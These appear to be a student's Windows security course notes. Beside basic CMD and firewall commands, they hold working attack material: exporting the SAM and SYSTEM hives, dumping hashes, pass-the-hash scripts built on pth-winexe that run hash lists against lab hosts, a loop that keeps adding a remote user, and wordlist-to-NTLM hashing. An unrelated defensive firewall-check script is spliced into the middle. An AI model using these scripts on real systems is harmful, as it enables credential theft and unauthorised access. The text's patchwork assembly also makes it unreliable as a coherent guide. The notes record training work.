30.04.2018 WINDOWS Module, Day 1
The focus of the module is working with CMD.

General info:
where the OS is installed; OS? explorer?
authentication: hash algorithms, the authentication process, lsass
C:\ = like root in Linux
dir = like ls
cd = change directory
System32 = the apps in it are owned by the system itself (NT AUTHORITY\SYSTEM)
System32 = like /bin in Linux

Commands:
C:\>.\calc
C:\>ping google.com
C:\>ping -n 10 google.com
C:\>ping -n 10 google.com -l 1500
C:\>.\whoami
C:\>ipconfig
C:\>netstat

Windows Firewall
On Win7:
C:\>netsh firewall set opmode disable
C:\>netsh advfirewall ???
On Win10:
##To turn off:
netsh advfirewall set allprofiles state off
##To turn on:
netsh advfirewall set allprofiles state on
##To check the status of Windows Firewall:
netsh advfirewall show allprofiles

Some protocols: RDP, SMB, VNC

Ease of Access button on the login screen
C:\>utilman.exe
C:\Windows\System32\config> SAM file: the location where the passwords are stored; also the SYSTEM file

Exercises:
verify internet access / C:\>ping
check which IP the PC has / C:\>ipconfig
show the users of the local system / C:\>net user
show the users at domain level / C:\>net user /domain
add a user / C:\>net user testdr test /add
privileges / C:\>net user testdr
change the password / C:\>net user testdr newpass
delete a user / C:\>net user testdr /delete
show the groups / C:\>net localgroup
add a user to a group / C:\>net localgroup administrators user /add

stuxnet ##type of attack
USB Rubber Ducky ##type of USB that is recognised as a keyboard
UAC = User Account Control ##pop-up for "run as"
Disable UAC? Enable UAC?
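Added example, not part of the course notes: after turning the firewall on or off with the netsh commands above, the check a practitioner wants is whether every profile really reports State ON. This Python script parses the output of `netsh advfirewall show allprofiles` (saved to a file, or fed as text) and lists the profiles whose state is OFF or missing. The sample output is constructed and trimmed to the relevant lines, and the patterns assume the English labels printed by netsh; a localized Windows prints translated labels and would need adjusted patterns.

```python
import re
import sys

# Constructed sample of "netsh advfirewall show allprofiles" output, trimmed to the
# lines that matter here; the real output carries many more settings per profile.
SAMPLE_NETSH_OUTPUT = """
Domain Profile Settings:
----------------------------------------------------------------------
State                                 ON
Firewall Policy                       BlockInbound,AllowOutbound

Private Profile Settings:
----------------------------------------------------------------------
State                                 ON
Firewall Policy                       BlockInbound,AllowOutbound

Public Profile Settings:
----------------------------------------------------------------------
State                                 OFF
Firewall Policy                       BlockInbound,AllowOutbound

Ok.
"""

EXPECTED_PROFILES = ("Domain", "Private", "Public")

# English netsh labels (assumption: the host prints English output).
PROFILE_HEADER = re.compile(r"^(Domain|Private|Public) Profile Settings:\s*$")
STATE_LINE = re.compile(r"^State\s+(ON|OFF)\s*$", re.IGNORECASE)


def parse_profiles(text: str) -> dict:
    """Map each firewall profile name to its State value ("ON" or "OFF")."""
    profiles = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        header = PROFILE_HEADER.match(line)
        if header:
            current = header.group(1)
            continue
        state = STATE_LINE.match(line)
        # Only the first State line under a header counts; later sub-sections
        # (Logging etc.) never carry a State line, but the guard keeps it safe.
        if state and current and current not in profiles:
            profiles[current] = state.group(1).upper()
    return profiles


def disabled_profiles(text: str) -> list:
    """Profiles present in the output whose firewall state is not ON, in output order."""
    return [name for name, state in parse_profiles(text).items() if state != "ON"]


def missing_profiles(text: str) -> list:
    """Profiles every Windows host should report but which are absent (truncated or localized output)."""
    found = parse_profiles(text)
    return [p for p in EXPECTED_PROFILES if p not in found]


if __name__ == "__main__":
    # Usage: netsh advfirewall show allprofiles > fw.txt ; python fwcheck.py fw.txt
    text = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE_NETSH_OUTPUT
    print("profiles:", parse_profiles(text))
    print("firewall OFF on:", disabled_profiles(text) or "none")
    print("not reported:", missing_profiles(text) or "none")
```

Treat a missing profile as a failed check rather than a pass: an unexpected output format (different language, a truncated capture) should never silently look like "all profiles ON".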
https://hashkiller.co.uk/ ##site for hash files
Bash Bunny ##usb tool, injects scripts
LAN Turtle (locked LAN) ##usb

##Export the SAM and SYSTEM files
reg save hklm\sam c:\sam
reg save hklm\system c:\system
##tool to open the SAM and SYSTEM files
pwdump system sam (run in the folder where the SAM and SYSTEM files are located)

#####################################################################################################
02.05
#####################################################################################################
04.05
#####################################################################################################
07.05.2018
With Win7, vector of the attack: pass the hash
1.
  1. make sure the Administrator exists and is enabled
  2. make sure the Administrator user has a password
  3. export the SAM and SYSTEM databases and extract the Administrator's hash
2.
  1. check that SMB is open on the target PC
  2. check whether the target PC is in a domain or a workgroup, since the pass and the hash work on both the domain and the local machine
  3. identify a pth tool, download it, analyse it
  4. with one of the pth tools carry out pass the hash and execute cmd
#####################################################################################################
9 May 2018
cd /Pth-toolkit
172.16.60.64, port 445
./pth-winexe -U WORKGROUP/Administrator%LM:NTLM //172.16.60.64 cmd

nano ntlmauth.py

import os
#import socket
#import sys
#from netaddr import IPNetwork
#import multiprocessing
#from multiprocessing.pool import ThreadPool

# run pth-winexe once per LM:NTLM line in hash.txt against the lab host
for line in open('hash.txt', 'r'):
    h = line.rstrip()
    os.system('./pth-winexe -U WORKGROUP/Administrator%{} //172.16.60.64 cmd'.format(h))

# the per-host scanner below was left commented out in the notes
#ip = sys.argv[1]
#port = 445
#def connect(i):
#    print(i)
#    try:
#        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#        s.settimeout(1)
#        r = s.connect_ex((str(i), 445))
#        if r == 0:
#            os.system('./pth-winexe -U WORKGROUP/Administrator%LM:NTLM //172.16.60.64 cmd')
#            # or: print('{} TCP/445 OPEN'.format(i))
#    except:
#        pass
#def threading():
#    pool = ThreadPool(multiprocessing.cpu_count())
#    pool.map(connect, IPNetwork(sys.argv[1]))
#    pool.close()
#    pool.join()
#if __name__ == '__main__':
#    print(' ')
#    threading()
#    print(' ')
#    connect()

python ntlmauth.py
python ntlmauth.py 172.16.60.1/24

LM: aad3b435b51404eeaad3b435b51404ee (the LM field shown when no LM hash is stored)
./pth-winexe -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634 //172.16.60.73 'net user q q /add'
or 'taskkill /F /IM cmd.exe'

cat fin.py

import time
import os

# keep re-running the remote command
while True:
    os.system("./pth-winexe -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634 //172.16.60.73 'net user q q /add'")

Find a wordlist with the top 500 passwords and convert it to LM and NTLM hashes.
LM: aad3b435b51404eeaad3b435b51404ee
Converting a password to NTLM:

import hashlib, binascii
# NT hash = MD4 over the UTF-16LE encoding of the password
# (on some OpenSSL 3 builds hashlib.new('md4') raises ValueError because MD4 is a legacy algorithm)
hash = hashlib.new('md4', "password".encode('utf-16le')).digest()
print(binascii.hexlify(hash).decode())

import sys
import hashlib, binascii
# one NT hash per line of the wordlist given as the first argument
for i in open(sys.argv[1]):
    i = i.rstrip()
    hash = hashlib.new('md4', i.encode('utf-16le')).digest()
    print(binascii.hexlify(hash).decode())

python file.py wordlist.txt

Write a script in bash or another language that reads each of the passwords until it finds the password and authenticates.
./pth-winexe -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42 //172.16.60.64 cmd
#####################################################################################################
11 May 2018
tasklist – lists the running processes
start
taskkill /F /PID 3420
taskkill = kill and pkill
taskkill /F /IM cmd.exe – kills every cmd connection (last hour's challenge)
query user – shows the logged-in users
tasklist
netstat -a
PowerShell – since cmd does not suit us
Payload
sudo msfconsole
use exploit …
taskkill.exe /F /PID 3420
Linux
migrate -N notepad.exe
The Process Explorer application
On Windows 7: enable the Administrator, set a password and enter the password
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=/32
#####################################################################################################
Challenge 1: add 5 users, 2 of them as administrators; document the password change and how to change it when the password parameter is not shown
Challenge 2: export SAM and SYSTEM, try to read the hash values, document it
Challenge 3: Sticky Keys: modify it with an application that is not cmd
Challenge 4: try to identify whether there is a process in Windows where logs are stored; if so, how it is activated
#####################################################################################################
WIN7
Disable/Enable SMB1 with PowerShell
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" SMB1 -Type DWORD -Value 0 -Force
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" SMB1 -Type DWORD -Value 1 -Force
Disable/Enable SMB1 with the Registry
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters
0 = Disabled
1 = Enabled
Server 2012 and 2008
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" SMB1 -Type DWORD -Value 0 -Force
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" SMB1 -Type DWORD -Value 1 -Force